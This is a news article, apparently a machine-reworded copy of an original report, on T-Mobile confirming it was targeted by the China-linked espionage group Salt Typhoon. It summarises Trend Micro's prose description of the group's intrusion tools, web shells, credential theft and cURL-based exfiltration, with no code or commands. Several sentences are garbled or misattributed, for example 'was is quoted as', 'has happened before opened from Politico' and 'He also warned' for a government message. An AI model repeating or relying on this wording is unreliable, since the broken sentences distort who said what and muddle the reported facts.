US telecommunications giant T-Mobile confirmed that it was also among the companies targeted by Chinese threats to gain access to valuable information.
Opponents tracked as Salt typhoonbreached the campaign as part of a “month-long campaign” designed to collect the mobile communications of “high-profile intelligence targets.” It is unclear what, if any, information was obtained during the malicious activity.
“T-Mobile is closely monitoring this industry-wide attack, and at this time T-Mobile’s systems and data have not been significantly impacted, and we have no evidence of impact to customer information,” a company spokesperson said. was is quoted as The Wall Street Journal said. “We will continue to monitor this closely, working with industry colleagues and the relevant authorities.”
With the latest development, T-Mobile joins a list of major organizations like AT&T, Verizon and Lumen Technologies that have been singled out as part of what appears to be a full-scale cyber espionage campaign.
So far, reports have not mentioned the degree of success of these attacks, whether any malware was installed or what information they were looking for. Salt Typhoon’s unauthorized access to Americans’ cellular data records has happened before opened from Politico.
Last week, the US Govt said an ongoing investigation into an attack on commercial telecommunications infrastructure has revealed a “broad and significant” breach orchestrated by the People’s Republic of China (PRC).
“China-linked actors have compromised networks at numerous telecommunications companies to enable data theft of customer records, the compromise of private communications of a limited number of individuals primarily involved in government or political activities, and the copying of certain information that was subject to US law enforcement requests in accordance with court rulings,” the message reads said.
He also warned that the extent and scope of those compromises could grow as the investigation continues.
Salt typhoonwhich is also known as Earth Estries, FamousSparrow, GhostEmperor and UNC2286, according to Trend Micro, has been active since at least 2020. In August 2023, the spy group was connected to a series of attacks targeting government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany and the US
Analysis shows that threat actors methodically crafted their payloads and used an interesting mix of legitimate and ad hoc tools and techniques to bypass defenses and maintain access to their targets.
“Earth Estries remains persistent by constantly updating its tools and using backdoors for lateral movement and credential theft,” Trend Micro researchers Ted Lee, Leon Chang, and Lennart Bermejo said in a comprehensive analysis published earlier this month.
“Data collection and cleaning is done with Trillclient, while tools like cURL are used to send information to anonymous file sharing services using proxies to hide backdoor traffic.”
The cybersecurity company said it observed two different attack chains used by the group, indicating that Salt Typhoon’s arsenal is as broad a trade as it is diverse. Initial access to target networks is facilitated by exploiting vulnerabilities in external services or remote control utilities.
In one set of attacks, a threat actor was found to be using vulnerable or misconfigured QConvergeConsole installations to deliver malware such as Cobalt Strike, a Go-based user stealer called TrillClientand backdoors like HemiGate and Crowdoora variant of SparrowDoor previously used by another China-linked group called Tropic Trooper.
Some of the other methods include using PSExec to side-install backdoors and tools, and TrillClient to harvest user credentials from web browser user profiles and move them to an attacker-controlled Gmail account via Simple Mail Transfer Protocol (SMTP) for further purposes.
In contrast, the second infection sequence is much more complex: threat actors abuse susceptible Microsoft Exchange servers to implant China Chopper web shell, which is then used to apply Cobalt Strike, Zingdorand Snappy (aka Deed RAT), the suspected successor ShadowPad malware.
“Delivery of these additional backdoors and tools is done either through the (command and control) server or by using cURL to download them from servers controlled by the attacker,” the researchers said. “These backdoors are also periodically replaced and updated.”
“Documents of interest are collected via RAR and exfiltrated using cURL, with the data sent to anonymous file sharing services.”
The attacks also use programs such as NinjaCopy for credential mining and PortScan for network discovery and mapping. Host persistence is achieved using scheduled tasks.
In one instance, Salt Typhoon is believed to have repurposed the victim’s proxy server to redirect traffic to the actual command and control server (C2) in an attempt to hide the malicious traffic.
Trend Micro noted that one of the infected machines also had two additional backdoors called Cryptmerlin, which executes additional commands issued by the C2 server, and FuxosDoor, an Internet Information Services (IIS) implant that is deployed on the compromised Exchange server and is also designed to run commands using cmd.exe.
“Our analysis of persistent TTP Earth Estries in sustained cyber operations reveals a sophisticated and adaptive threat actor using a variety of tools and backdoors, demonstrating not only technical capabilities but also a strategic approach to maintaining access and control in breached environments,” researchers . said.
“Throughout its campaigns, Earth Estries has demonstrated a deep understanding of its target environment, consistently identifying exposed layers for re-entry. Using a combination of known tools and special backdoors, they have created a multi-layered attack strategy that is difficult to detect and mitigate.”
